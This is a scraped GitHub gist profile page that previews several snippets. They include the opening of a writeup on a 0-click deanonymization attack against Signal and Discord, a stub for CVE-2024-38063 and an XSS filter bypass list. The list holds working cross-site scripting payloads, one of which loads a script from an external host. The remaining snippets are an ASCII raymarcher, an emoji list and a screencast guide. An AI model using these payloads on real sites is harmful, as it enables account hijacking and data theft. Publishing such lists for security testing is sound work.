Skip to content

Instantly share code, notes, and snippets.

View petercunha's full-sized avatar

Peter Cunha petercunha

318 followers · 173 following
  • Digital Disbursements
  • Los Angeles, California
View GitHub Profile
@hackermondev
hackermondev / research.md
Last active April 19, 2025 17:13
Unique 0-click deanonymization attack targeting Signal, Discord and hundreds of platform

hi, i'm daniel. i'm a 15-year-old high school junior. in my free time, i hack billion dollar companies and build cool stuff.

3 months ago, I discovered a unique 0-click deanonymization attack that allows an attacker to grab the location of any target within a 250 mile radius. With a vulnerable app installed on a target's phone (or as a background application on their laptop), an attacker can send a malicious payload and deanonymize you within seconds--and you wouldn't even know.

I'm publishing this writeup and research as a warning, especially for journalists, activists, and hackers, about this type of undetectable attack. Hundreds of applications are vulnerable, including some of the most popular apps in the world: Signal, Discord, Twitter/X, and others. Here's how it works:

Cloudflare

By the numbers, Cloudflare is easily the most popular CDN on the market. It beats out competitors such as Sucuri, Amazon CloudFront, Akamai, and Fastly. In 2019, a major Cloudflare outage k

@nullenc0de
nullenc0de / CVE-2024-38063.py
Created August 16, 2024 14:02
class IPv6Packet:
def __init__(self, main_header_length, extension_headers):
self.main_header_length = main_header_length
self.extension_headers = extension_headers
def process_packet(packet):
total_length = packet.main_header_length
# Vulnerable loop: doesn't check for integer underflow
for header_length in packet.extension_headers:
@SEAPUNK
SEAPUNK / 0.gif
Last active August 25, 2023 04:25
hey
0.gif
@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active April 18, 2025 16:31
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@Wunkolo
Wunkolo / compact.cpp
Last active May 5, 2024 20:21
Ascii Raymarcher(old)
#include <math.h>
#include <algorithm>
#include <string>
#include <immintrin.h>
using namespace std;typedef float R;
#define _W 79
#define _H 39
#define EP 0.01f
#define OP operator
#define C const
@rxaviers
rxaviers / gist:7360908
Last active April 20, 2025 15:23
Complete list of github markdown emoji markup

People

:bowtie: :bowtie: πŸ˜„ :smile: πŸ˜† :laughing:
😊 :blush: πŸ˜ƒ :smiley: ☺️ :relaxed:
😏 :smirk: 😍 :heart_eyes: 😘 :kissing_heart:
😚 :kissing_closed_eyes: 😳 :flushed: 😌 :relieved:
πŸ˜† :satisfied: 😁 :grin: πŸ˜‰ :wink:
😜 :stuck_out_tongue_winking_eye: 😝 :stuck_out_tongue_closed_eyes: πŸ˜€ :grinning:
πŸ˜— :kissing: πŸ˜™ :kissing_smiling_eyes: πŸ˜› :stuck_out_tongue:
@dergachev
dergachev / GIF-Screencast-OSX.md
Last active April 20, 2025 21:14
OS X Screencast to animated GIF

OS X Screencast to animated GIF

This gist shows how to create a GIF screencast using only free OS X tools: QuickTime, ffmpeg, and gifsicle.

Screencapture GIF

Instructions

To capture the video (filesize: 19MB), using the free "QuickTime Player" application: